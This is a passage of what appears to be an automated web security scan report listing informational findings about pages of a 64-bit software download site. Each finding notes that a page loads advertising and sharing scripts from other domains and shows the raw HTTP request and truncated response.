Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22group%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22group%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86955


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1351. http://www.x64bitdownload.com/64-bit-groups-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-groups-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-groups-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:54 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:10:00 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22groups%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22groups%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92245


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1352. http://www.x64bitdownload.com/64-bit-highspeed-connection-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-highspeed-connection-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-highspeed-connection-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:46:52 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:57:20 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A20%3A%22highspeed-connection%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A20%3A%22highspeed+connection%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32070


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1353. http://www.x64bitdownload.com/64-bit-image-grabber-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-image-grabber-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-image-grabber-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:52:40 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:02:48 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A13%3A%22image-grabber%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A13%3A%22image+grabber%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91637


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1354. http://www.x64bitdownload.com/64-bit-images-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-images-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-images-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:39:43 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:50:29 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22images%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22images%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91682


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1355. http://www.x64bitdownload.com/64-bit-internet-c-44-newsgroup-clients-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-internet-c-44-newsgroup-clients-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-internet-c-44-newsgroup-clients-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:34:26 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:44:29 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22internet%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22internet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39465


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1356. http://www.x64bitdownload.com/64-bit-internet-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-internet-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-internet-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:46:49 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:56:59 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22internet%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22internet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 93902


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1357. http://www.x64bitdownload.com/64-bit-kill-file-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-kill-file-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-kill-file-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:56:00 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:06:31 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22kill-file%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22kill+file%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 93504


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1358. http://www.x64bitdownload.com/64-bit-killfile-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-killfile-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-killfile-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:57:21 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:07:25 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22killfile%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22killfile%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28388


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1359. http://www.x64bitdownload.com/64-bit-mp3-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-mp3-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-mp3-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:39:12 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:49:24 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22mp3%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22mp3%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94965


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1360. http://www.x64bitdownload.com/64-bit-multimedia-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-multimedia-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-multimedia-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:39:45 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:50:19 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22multimedia%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22multimedia%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92538


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1361. http://www.x64bitdownload.com/64-bit-multipart-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-multipart-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-multipart-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:38:35 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:48:39 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22multipart%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22multipart%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 73514


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1362. http://www.x64bitdownload.com/64-bit-news-c-44-newsgroup-clients-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-news-c-44-newsgroup-clients-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-news-c-44-newsgroup-clients-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:34:23 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:44:35 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22news%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22news%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 42617


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1363. http://www.x64bitdownload.com/64-bit-news-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-news-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-news-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:34:38 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:45:00 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22news%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22news%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86979


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1364. http://www.x64bitdownload.com/64-bit-news-reader-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
